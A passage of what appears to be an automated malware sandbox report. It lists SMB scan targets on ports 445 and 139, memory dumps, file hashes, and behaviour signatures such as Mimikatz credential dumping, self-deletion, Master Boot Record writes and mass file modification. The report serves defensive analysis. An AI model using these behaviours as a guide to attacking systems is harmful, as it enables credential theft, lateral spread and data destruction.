| N/A | 10.127.0.198:445 | tcp | |
| N/A | 10.127.0.198:139 | tcp | |
| N/A | 10.127.0.199:445 | tcp | |
| N/A | 10.127.0.199:139 | tcp | |
| N/A | 10.127.0.200:445 | tcp | |
| N/A | 10.127.0.200:139 | tcp | |
| N/A | 10.127.0.201:445 | tcp | |
| N/A | 10.127.0.201:139 | tcp | |
| N/A | 10.127.0.202:445 | tcp | |
| N/A | 10.127.0.202:139 | tcp | |
| N/A | 10.127.0.203:445 | tcp | |
| N/A | 10.127.0.203:139 | tcp | |
| N/A | 10.127.0.204:445 | tcp | |
| N/A | 10.127.0.204:139 | tcp | |
| N/A | 10.127.0.205:445 | tcp | |
| N/A | 10.127.0.205:139 | tcp | |
| N/A | 10.127.0.206:445 | tcp | |
| N/A | 10.127.0.206:139 | tcp | |
| N/A | 10.127.0.207:445 | tcp | |
| N/A | 10.127.0.207:139 | tcp | |
| N/A | 10.127.0.208:445 | tcp | |
| N/A | 10.127.0.209:445 | tcp | |
| N/A | 10.127.0.209:139 | tcp | |
| N/A | 10.127.0.210:445 | tcp | |
| N/A | 10.127.0.210:139 | tcp | |
| N/A | 10.127.0.211:445 | tcp | |
| N/A | 10.127.0.211:139 | tcp | |
| N/A | 10.127.0.212:445 | tcp | |
| N/A | 10.127.0.212:139 | tcp | |
| N/A | 10.127.0.213:445 | tcp | |
| N/A | 10.127.0.213:139 | tcp | |
| N/A | 10.127.0.214:445 | tcp | |
| N/A | 10.127.0.214:139 | tcp | |
| N/A | 10.127.0.215:445 | tcp | |
| N/A | 10.127.0.215:139 | tcp | |
| N/A | 10.127.0.216:445 | tcp | |
| N/A | 10.127.0.216:139 | tcp | |
| N/A | 10.127.0.217:445 | tcp | |
| N/A | 10.127.0.217:139 | tcp | |
| N/A | 10.127.0.218:445 | tcp | |
| N/A | 10.127.0.218:139 | tcp | |
| N/A | 10.127.0.219:445 | tcp | |
| N/A | 10.127.0.219:139 | tcp | |
| N/A | 10.127.0.220:445 | tcp | |
| N/A | 10.127.0.220:139 | tcp | |
| N/A | 10.127.0.221:445 | tcp | |
| N/A | 10.127.0.221:139 | tcp | |
| N/A | 10.127.0.222:445 | tcp | |
| N/A | 10.127.0.222:139 | tcp | |
| N/A | 10.127.0.223:445 | tcp | |
| N/A | 10.127.0.223:139 | tcp | |
| N/A | 10.127.0.224:445 | tcp | |
| N/A | 10.127.0.224:139 | tcp | |
| N/A | 10.127.0.225:445 | tcp | |
| N/A | 10.127.0.225:139 | tcp | |
| N/A | 10.127.0.226:445 | tcp | |
| N/A | 10.127.0.226:139 | tcp | |
| N/A | 10.127.0.227:445 | tcp | |
| N/A | 10.127.0.227:139 | tcp | |
| N/A | 10.127.0.228:445 | tcp | |
| N/A | 10.127.0.228:139 | tcp | |
| N/A | 10.127.0.229:445 | tcp | |
| N/A | 10.127.0.229:139 | tcp | |
| N/A | 10.127.0.230:445 | tcp | |
| N/A | 10.127.0.230:139 | tcp | |
| N/A | 10.127.0.231:445 | tcp | |
| N/A | 10.127.0.231:139 | tcp | |
| N/A | 10.127.0.232:445 | tcp | |
| N/A | 10.127.0.232:139 | tcp | |
| N/A | 10.127.0.233:445 | tcp | |
| N/A | 10.127.0.233:139 | tcp | |
| N/A | 10.127.0.234:445 | tcp | |
| N/A | 10.127.0.234:139 | tcp | |
| N/A | 10.127.0.235:445 | tcp | |
| N/A | 10.127.0.235:139 | tcp | |
| N/A | 10.127.0.236:445 | tcp | |
| N/A | 10.127.0.236:139 | tcp | |
| N/A | 10.127.0.237:445 | tcp | |
| N/A | 10.127.0.237:139 | tcp | |
| N/A | 10.127.0.238:445 | tcp | |
| N/A | 10.127.0.238:139 | tcp | |
| N/A | 10.127.0.239:445 | tcp | |
| N/A | 10.127.0.239:139 | tcp | |
| N/A | 10.127.0.240:445 | tcp | |
| N/A | 10.127.0.240:139 | tcp | |
| N/A | 10.127.0.241:445 | tcp | |
| N/A | 10.127.0.241:139 | tcp | |
| N/A | 10.127.0.242:445 | tcp | |
| N/A | 10.127.0.242:139 | tcp | |
| N/A | 10.127.0.243:445 | tcp | |
| N/A | 10.127.0.243:139 | tcp | |
| N/A | 10.127.0.244:445 | tcp | |
| N/A | 10.127.0.244:139 | tcp | |
| N/A | 10.127.0.245:445 | tcp | |
| N/A | 10.127.0.245:139 | tcp | |
| N/A | 10.127.0.246:445 | tcp | |
| N/A | 10.127.0.246:139 | tcp | |
| N/A | 10.127.0.247:445 | tcp | |
| N/A | 10.127.0.247:139 | tcp | |
| N/A | 10.127.0.248:445 | tcp | |
| N/A | 10.127.0.248:139 | tcp | |
| N/A | 10.127.0.249:445 | tcp | |
| N/A | 10.127.0.249:139 | tcp | |
| N/A | 10.127.0.250:445 | tcp | |
| N/A | 10.127.0.250:139 | tcp | |
| N/A | 10.127.0.251:445 | tcp | |
| N/A | 10.127.0.251:139 | tcp | |
| N/A | 10.127.0.252:445 | tcp | |
| N/A | 10.127.0.252:139 | tcp | |
| N/A | 10.127.0.253:445 | tcp | |
| N/A | 10.127.0.253:139 | tcp | |
| N/A | 10.127.0.254:445 | tcp | |
| N/A | 10.127.0.254:139 | tcp | |
| N/A | 10.127.0.255:445 | tcp | |
| N/A | 10.127.0.255:139 | tcp | |
| N/A | 10.127.1.0:445 | tcp | |
| N/A | 10.127.1.0:139 | tcp | |
| N/A | 10.127.1.1:445 | tcp | |
| N/A | 10.127.1.1:139 | tcp | |
| N/A | 10.127.1.2:445 | tcp | |
| N/A | 10.127.1.2:139 | tcp | |
| N/A | 10.127.1.3:445 | tcp | |
| N/A | 10.127.1.3:139 | tcp | |
| N/A | 10.127.1.4:445 | tcp | |
| N/A | 10.127.1.4:139 | tcp | |
| N/A | 10.127.1.5:445 | tcp | |
| N/A | 10.127.1.5:139 | tcp | |
| N/A | 10.127.1.6:445 | tcp | |
| N/A | 10.127.1.6:139 | tcp | |
| N/A | 10.127.1.7:445 | tcp | |
| N/A | 10.127.1.7:139 | tcp | |
| N/A | 10.127.1.8:445 | tcp | |
| N/A | 10.127.1.8:139 | tcp | |
| N/A | 10.127.1.9:445 | tcp | |
| N/A | 10.127.1.9:139 | tcp | |
| N/A | 10.127.1.10:445 | tcp | |
| N/A | 10.127.1.10:139 | tcp | |
| N/A | 10.127.1.11:445 | tcp | |
| N/A | 10.127.1.11:139 | tcp | |
| N/A | 10.127.1.12:445 | tcp | |
| N/A | 10.127.1.12:139 | tcp | |
| N/A | 10.127.1.13:445 | tcp | |
| N/A | 10.127.1.13:139 | tcp | |
| N/A | 10.127.1.14:445 | tcp | |
| N/A | 10.127.1.14:139 | tcp | |
| N/A | 10.127.1.15:445 | tcp | |
| N/A | 10.127.1.15:139 | tcp | |
| N/A | 10.127.1.16:445 | tcp | |
| N/A | 10.127.1.16:139 | tcp | |
| N/A | 10.127.1.17:445 | tcp | |
| N/A | 10.127.1.17:139 | tcp | |
| N/A | 10.127.1.18:445 | tcp | |
| N/A | 10.127.1.18:139 | tcp | |
| N/A | 10.127.1.19:445 | tcp | |
| N/A | 10.127.1.19:139 | tcp | |
| N/A | 10.127.1.20:445 | tcp | |
| N/A | 10.127.1.20:139 | tcp | |
| N/A | 10.127.1.21:445 | tcp | |
| N/A | 10.127.1.21:139 | tcp | |
| N/A | 10.127.1.22:445 | tcp | |
| N/A | 10.127.1.22:139 | tcp | |
| N/A | 10.127.1.23:445 | tcp | |
| N/A | 10.127.1.23:139 | tcp | |
| N/A | 10.127.1.24:445 | tcp | |
| N/A | 10.127.1.24:139 | tcp | |
| N/A | 10.127.1.25:445 | tcp | |
| N/A | 10.127.1.25:139 | tcp | |
| N/A | 10.127.1.26:445 | tcp | |
| N/A | 10.127.1.26:139 | tcp | |
| N/A | 10.127.1.27:445 | tcp | |
| N/A | 10.127.1.27:139 | tcp | |
| N/A | 10.127.1.28:445 | tcp | |
| N/A | 10.127.1.28:139 | tcp | |
| N/A | 10.127.1.29:445 | tcp | |
| N/A | 10.127.1.29:139 | tcp | |
| N/A | 10.127.1.30:445 | tcp | |
| N/A | 10.127.1.30:139 | tcp | |
| N/A | 10.127.1.31:445 | tcp | |
| N/A | 10.127.1.31:139 | tcp | |
| N/A | 10.127.1.32:445 | tcp | |
| N/A | 10.127.1.32:139 | tcp | |
| N/A | 10.127.1.33:445 | tcp | |
| N/A | 10.127.1.33:139 | tcp | |
| N/A | 10.127.1.34:445 | tcp | |
| N/A | 10.127.1.34:139 | tcp | |
| N/A | 10.127.1.35:445 | tcp | |
| N/A | 10.127.1.35:139 | tcp | |
| N/A | 10.127.1.36:445 | tcp | |
| N/A | 10.127.1.36:139 | tcp | |
| N/A | 10.127.1.37:445 | tcp | |
| N/A | 10.127.1.37:139 | tcp | |
| N/A | 10.127.1.38:445 | tcp | |
| N/A | 10.127.1.38:139 | tcp | |
| N/A | 10.127.1.39:445 | tcp | |
| N/A | 10.127.1.39:139 | tcp | |
| N/A | 10.127.1.40:445 | tcp | |
| N/A | 10.127.1.40:139 | tcp | |
| N/A | 10.127.1.41:445 | tcp | |
| N/A | 10.127.1.41:139 | tcp | |
| N/A | 10.127.1.42:445 | tcp | |
| N/A | 10.127.1.42:139 | tcp | |
| N/A | 10.127.1.43:445 | tcp | |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.1.43:139 | tcp | |
| N/A | 10.127.1.44:445 | tcp | |
| N/A | 10.127.1.44:139 | tcp | |
| N/A | 10.127.1.45:445 | tcp | |
| N/A | 10.127.1.45:139 | tcp | |
| N/A | 10.127.1.46:445 | tcp | |
| DE | 136.243.76.21:445 | tcp | |
| N/A | 10.127.1.46:139 | tcp | |
| N/A | 10.127.1.47:445 | tcp | |
| N/A | 10.127.1.47:139 | tcp | |
| N/A | 10.127.1.48:445 | tcp | |
| N/A | 10.127.1.48:139 | tcp | |
| N/A | 10.127.1.49:445 | tcp | |
| N/A | 10.127.1.49:139 | tcp | |
| N/A | 10.127.0.0:445 | tcp | |
| N/A | 10.127.1.50:445 | tcp | |
| N/A | 10.127.1.50:139 | tcp | |
| N/A | 10.127.1.51:445 | tcp | |
| N/A | 10.127.1.51:139 | tcp | |
| N/A | 10.127.1.52:445 | tcp | |
| N/A | 10.127.1.52:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.1.53:445 | tcp | |
| N/A | 10.127.1.53:139 | tcp | |
| N/A | 10.127.1.54:445 | tcp | |
| N/A | 10.127.1.54:139 | tcp | |
| N/A | 10.127.1.55:445 | tcp | |
| N/A | 10.127.1.55:139 | tcp | |
| N/A | 10.127.1.56:445 | tcp | |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.1.56:139 | tcp | |
| N/A | 10.127.1.57:445 | tcp | |
| N/A | 10.127.1.57:139 | tcp | |
| N/A | 10.127.1.58:445 | tcp | |
| N/A | 10.127.1.58:139 | tcp | |
| N/A | 10.127.1.59:445 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.1.59:139 | tcp | |
| N/A | 10.127.1.60:445 | tcp | |
| N/A | 10.127.1.60:139 | tcp | |
| N/A | 10.127.1.61:445 | tcp | |
| N/A | 10.127.1.61:139 | tcp | |
| N/A | 10.127.1.62:445 | tcp | |
| N/A | 10.127.1.62:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.1.63:445 | tcp | |
| N/A | 10.127.1.63:139 | tcp | |
| N/A | 10.127.1.64:445 | tcp | |
| N/A | 10.127.1.64:139 | tcp | |
| N/A | 10.127.1.65:445 | tcp | |
| N/A | 10.127.1.65:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.1.66:445 | tcp | |
| N/A | 10.127.1.66:139 | tcp | |
| N/A | 10.127.1.67:445 | tcp | |
| N/A | 10.127.1.67:139 | tcp | |
| N/A | 10.127.1.68:445 | tcp | |
| N/A | 10.127.1.68:139 | tcp | |
| N/A | 10.127.1.69:445 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.1.69:139 | tcp | |
| N/A | 10.127.1.70:445 | tcp | |
| N/A | 10.127.1.70:139 | tcp | |
| N/A | 10.127.1.71:445 | tcp | |
| N/A | 10.127.1.71:139 | tcp | |
| N/A | 10.127.1.72:445 | tcp | |
| N/A | 10.127.0.8:445 | tcp | |
| N/A | 10.127.1.72:139 | tcp | |
| N/A | 10.127.1.73:445 | tcp | |
| N/A | 10.127.1.73:139 | tcp | |
| N/A | 10.127.1.74:445 | tcp | |
| N/A | 10.127.1.74:139 | tcp | |
| N/A | 10.127.1.75:445 | tcp | |
| N/A | 10.127.1.75:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.1.76:445 | tcp | |
| N/A | 10.127.1.76:139 | tcp | |
| N/A | 10.127.1.77:445 | tcp | |
| N/A | 10.127.1.77:139 | tcp | |
| N/A | 10.127.1.78:445 | tcp | |
| N/A | 10.127.1.78:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.1.79:445 | tcp | |
| N/A | 10.127.1.79:139 | tcp | |
| N/A | 10.127.1.80:445 | tcp | |
| N/A | 10.127.1.80:139 | tcp | |
| N/A | 10.127.1.81:445 | tcp | |
| N/A | 10.127.1.81:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.1.82:445 | tcp | |
| N/A | 10.127.1.82:139 | tcp | |
| N/A | 10.127.1.83:445 | tcp | |
| N/A | 10.127.1.83:139 | tcp | |
| N/A | 10.127.1.84:445 | tcp | |
| N/A | 10.127.1.84:139 | tcp | |
| N/A | 10.127.1.85:445 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.1.85:139 | tcp | |
| N/A | 10.127.1.86:445 | tcp | |
| N/A | 10.127.1.86:139 | tcp | |
| N/A | 10.127.1.87:445 | tcp | |
| N/A | 10.127.1.87:139 | tcp | |
| N/A | 10.127.1.88:445 | tcp | |
| N/A | 10.127.1.88:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.1.89:445 | tcp | |
| N/A | 10.127.1.89:139 | tcp | |
| N/A | 10.127.1.90:445 | tcp | |
| N/A | 10.127.1.90:139 | tcp | |
| N/A | 10.127.1.91:445 | tcp | |
| N/A | 10.127.1.91:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.1.92:445 | tcp | |
| N/A | 10.127.1.92:139 | tcp | |
| N/A | 10.127.1.93:445 | tcp | |
| N/A | 10.127.1.93:139 | tcp | |
| N/A | 10.127.1.94:445 | tcp | |
| N/A | 10.127.1.94:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.1.95:445 | tcp | |
| N/A | 10.127.1.95:139 | tcp | |
| N/A | 10.127.1.96:445 | tcp | |
| N/A | 10.127.1.96:139 | tcp | |
| N/A | 10.127.1.97:445 | tcp | |
| N/A | 10.127.1.97:139 | tcp | |
| N/A | 10.127.1.98:445 | tcp | |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.1.98:139 | tcp | |
| N/A | 10.127.1.99:445 | tcp | |
| N/A | 10.127.1.99:139 | tcp | |
| N/A | 10.127.1.100:445 | tcp | |
| N/A | 10.127.1.100:139 | tcp | |
| N/A | 10.127.1.101:445 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.1.101:139 | tcp | |
| N/A | 10.127.1.102:445 | tcp | |
| N/A | 10.127.1.102:139 | tcp | |
| N/A | 10.127.1.103:445 | tcp | |
| N/A | 10.127.1.103:139 | tcp | |
| N/A | 10.127.1.104:445 | tcp | |
| N/A | 10.127.1.104:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.1.105:445 | tcp | |
| N/A | 10.127.1.105:139 | tcp | |
| N/A | 10.127.1.106:445 | tcp | |
| N/A | 10.127.1.106:139 | tcp | |
| N/A | 10.127.1.107:445 | tcp | |
| N/A | 10.127.1.107:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.1.108:445 | tcp | |
| N/A | 10.127.1.108:139 | tcp | |
| N/A | 10.127.1.109:445 | tcp | |
| N/A | 10.127.1.109:139 | tcp | |
| N/A | 10.127.1.110:445 | tcp | |
| N/A | 10.127.1.110:139 | tcp | |
| N/A | 10.127.1.111:445 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.1.111:139 | tcp | |
| N/A | 10.127.1.112:445 | tcp | |
| N/A | 10.127.1.112:139 | tcp | |
| N/A | 10.127.1.113:445 | tcp | |
| N/A | 10.127.1.113:139 | tcp | |
| N/A | 10.127.1.114:445 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.1.114:139 | tcp | |
| N/A | 10.127.1.115:445 | tcp | |
| N/A | 10.127.1.115:139 | tcp | |
| N/A | 10.127.1.116:445 | tcp | |
| N/A | 10.127.1.116:139 | tcp | |
| N/A | 10.127.1.117:445 | tcp | |
| N/A | 10.127.1.117:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.1.118:445 | tcp | |
| N/A | 10.127.1.118:139 | tcp | |
| N/A | 10.127.1.119:445 | tcp | |
| N/A | 10.127.1.119:139 | tcp | |
| N/A | 10.127.1.120:445 | tcp | |
| N/A | 10.127.1.120:139 | tcp | |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.1.121:445 | tcp | |
| N/A | 10.127.1.121:139 | tcp | |
| N/A | 10.127.1.122:445 | tcp | |
| N/A | 10.127.1.122:139 | tcp | |
| N/A | 10.127.1.123:445 | tcp | |
| N/A | 10.127.1.123:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.1.124:445 | tcp | |
| N/A | 10.127.1.124:139 | tcp | |
| N/A | 10.127.1.125:445 | tcp | |
| N/A | 10.127.1.125:139 | tcp | |
| N/A | 10.127.1.126:445 | tcp | |
| N/A | 10.127.1.126:139 | tcp | |
| N/A | 10.127.1.127:445 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.1.127:139 | tcp | |
| N/A | 10.127.1.128:445 | tcp | |
| N/A | 10.127.1.128:139 | tcp | |
| N/A | 10.127.1.129:445 | tcp | |
| N/A | 10.127.1.129:139 | tcp | |
| N/A | 10.127.1.130:445 | tcp | |
| N/A | 10.127.1.130:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.1.131:445 | tcp | |
| N/A | 10.127.1.131:139 | tcp | |
| N/A | 10.127.1.132:445 | tcp | |
| N/A | 10.127.1.132:139 | tcp | |
| N/A | 10.127.1.133:445 | tcp | |
| N/A | 10.127.1.133:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.1.134:445 | tcp | |
| N/A | 10.127.1.134:139 | tcp | |
| N/A | 10.127.1.135:445 | tcp | |
| N/A | 10.127.1.135:139 | tcp | |
| N/A | 10.127.1.136:445 | tcp | |
| N/A | 10.127.1.136:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.1.137:445 | tcp | |
| N/A | 10.127.1.137:139 | tcp | |
| N/A | 10.127.1.138:445 | tcp | |
| N/A | 10.127.1.138:139 | tcp | |
| N/A | 10.127.1.139:445 | tcp | |
| N/A | 10.127.1.139:139 | tcp | |
| N/A | 10.127.1.140:445 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.1.140:139 | tcp | |
| N/A | 10.127.1.141:445 | tcp | |
| N/A | 10.127.1.141:139 | tcp | |
| N/A | 10.127.1.142:445 | tcp | |
| N/A | 10.127.1.142:139 | tcp | |
| N/A | 10.127.1.143:445 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.1.143:139 | tcp | |
| N/A | 10.127.1.144:445 | tcp | |
| N/A | 10.127.1.144:139 | tcp | |
| N/A | 10.127.1.145:445 | tcp | |
| N/A | 10.127.1.145:139 | tcp | |
| N/A | 10.127.1.146:445 | tcp | |
| N/A | 10.127.1.146:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.1.147:445 | tcp | |
| N/A | 10.127.1.147:139 | tcp | |
| N/A | 10.127.1.148:445 | tcp | |
| N/A | 10.127.1.148:139 | tcp | |
| N/A | 10.127.1.149:445 | tcp | |
| N/A | 10.127.1.149:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.1.150:445 | tcp | |
| N/A | 10.127.1.150:139 | tcp | |
| N/A | 10.127.1.151:445 | tcp | |
| N/A | 10.127.1.151:139 | tcp | |
| N/A | 10.127.1.152:445 | tcp | |
| N/A | 10.127.1.152:139 | tcp | |
| N/A | 10.127.1.153:445 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.1.153:139 | tcp | |
| N/A | 10.127.1.154:445 | tcp | |
| N/A | 10.127.1.154:139 | tcp | |
| N/A | 10.127.1.155:445 | tcp | |
| N/A | 10.127.1.155:139 | tcp | |
| N/A | 10.127.1.156:445 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.1.156:139 | tcp | |
| N/A | 10.127.1.157:445 | tcp | |
| N/A | 10.127.1.157:139 | tcp | |
| N/A | 10.127.1.158:445 | tcp | |
| N/A | 10.127.1.158:139 | tcp | |
| N/A | 10.127.1.159:445 | tcp | |
| N/A | 10.127.1.159:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.1.160:445 | tcp | |
| N/A | 10.127.1.160:139 | tcp | |
| N/A | 10.127.1.161:445 | tcp | |
| N/A | 10.127.1.161:139 | tcp | |
| N/A | 10.127.1.162:445 | tcp | |
| N/A | 10.127.1.162:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.1.163:445 | tcp | |
| N/A | 10.127.1.163:139 | tcp | |
| N/A | 10.127.1.164:445 | tcp | |
| N/A | 10.127.1.164:139 | tcp | |
| N/A | 10.127.1.165:445 | tcp | |
| N/A | 10.127.1.165:139 | tcp | |
| N/A | 10.127.1.166:445 | tcp | |
| N/A | 10.127.0.37:445 | tcp | |
| N/A | 10.127.1.166:139 | tcp | |
| N/A | 10.127.1.167:445 | tcp | |
| N/A | 10.127.1.167:139 | tcp | |
| N/A | 10.127.1.168:445 | tcp | |
| N/A | 10.127.1.168:139 | tcp | |
| N/A | 10.127.1.169:445 | tcp | |
| N/A | 10.127.0.38:445 | tcp | |
| N/A | 10.127.1.169:139 | tcp | |
| N/A | 10.127.1.170:445 | tcp | |
| N/A | 10.127.1.170:139 | tcp | |
| N/A | 10.127.1.171:445 | tcp | |
| N/A | 10.127.1.171:139 | tcp | |
| N/A | 10.127.1.172:445 | tcp | |
| N/A | 10.127.0.39:445 | tcp | |
| N/A | 10.127.1.172:139 | tcp | |
| N/A | 10.127.1.173:445 | tcp | |
| N/A | 10.127.1.173:139 | tcp | |
| N/A | 10.127.1.174:445 | tcp | |
| N/A | 10.127.1.174:139 | tcp | |
| N/A | 10.127.1.175:445 | tcp | |
| N/A | 10.127.1.175:139 | tcp | |
| N/A | 10.127.0.40:445 | tcp | |
| N/A | 10.127.1.176:445 | tcp | |
| N/A | 10.127.1.176:139 | tcp | |
| N/A | 10.127.1.177:445 | tcp | |
| N/A | 10.127.1.177:139 | tcp | |
| N/A | 10.127.1.178:445 | tcp | |
| N/A | 10.127.1.178:139 | tcp | |
| N/A | 10.127.0.41:445 | tcp | |
| N/A | 10.127.1.179:445 | tcp | |
| N/A | 10.127.1.179:139 | tcp | |
| N/A | 10.127.1.180:445 | tcp | |
| N/A | 10.127.1.180:139 | tcp | |
| N/A | 10.127.1.181:445 | tcp | |
| N/A | 10.127.1.181:139 | tcp | |
| N/A | 10.127.1.182:445 | tcp | |
| N/A | 10.127.0.42:445 | tcp | |
| N/A | 10.127.1.182:139 | tcp | |
| N/A | 10.127.1.183:445 | tcp | |
| N/A | 10.127.1.183:139 | tcp | |
| N/A | 10.127.1.184:445 | tcp | |
| N/A | 10.127.1.184:139 | tcp | |
| N/A | 10.127.1.185:445 | tcp | |
| N/A | 10.127.0.43:445 | tcp | |
| N/A | 10.127.1.185:139 | tcp | |
| N/A | 10.127.1.186:445 | tcp | |
| N/A | 10.127.1.186:139 | tcp | |
| N/A | 10.127.1.187:445 | tcp | |
| N/A | 10.127.1.187:139 | tcp | |
| N/A | 10.127.1.188:445 | tcp | |
| N/A | 10.127.1.188:139 | tcp | |
| N/A | 10.127.0.44:445 | tcp | |
| N/A | 10.127.1.189:445 | tcp | |
| N/A | 10.127.1.189:139 | tcp | |
| N/A | 10.127.1.190:445 | tcp | |
| N/A | 10.127.1.190:139 | tcp | |
| N/A | 10.127.1.191:445 | tcp | |
| N/A | 10.127.1.191:139 | tcp | |
| N/A | 10.127.0.45:445 | tcp | |
| N/A | 10.127.1.192:445 | tcp |
Files
memory/1144-0-0x00000000001C0000-0x000000000021E000-memory.dmp
memory/1144-8-0x00000000001C0000-0x000000000021E000-memory.dmp
memory/1144-11-0x00000000001C0000-0x000000000021E000-memory.dmp
memory/1144-23-0x00000000001C0000-0x000000000021E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\202E.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/1144-9-0x00000000001C0000-0x000000000021E000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-30 00:59
Reported
2024-06-30 01:30
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1807s
Command Line
Signatures
Mimikatz
mimikatz is an open source tool to dump credentials on Windows
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\56AB.tmp | N/A |
Reads user/profile data of web browsers
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgePackages.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\EditImport.vbs | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\chrome.7z | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\ImportStart.docx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\InstallUnpublish.docx | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
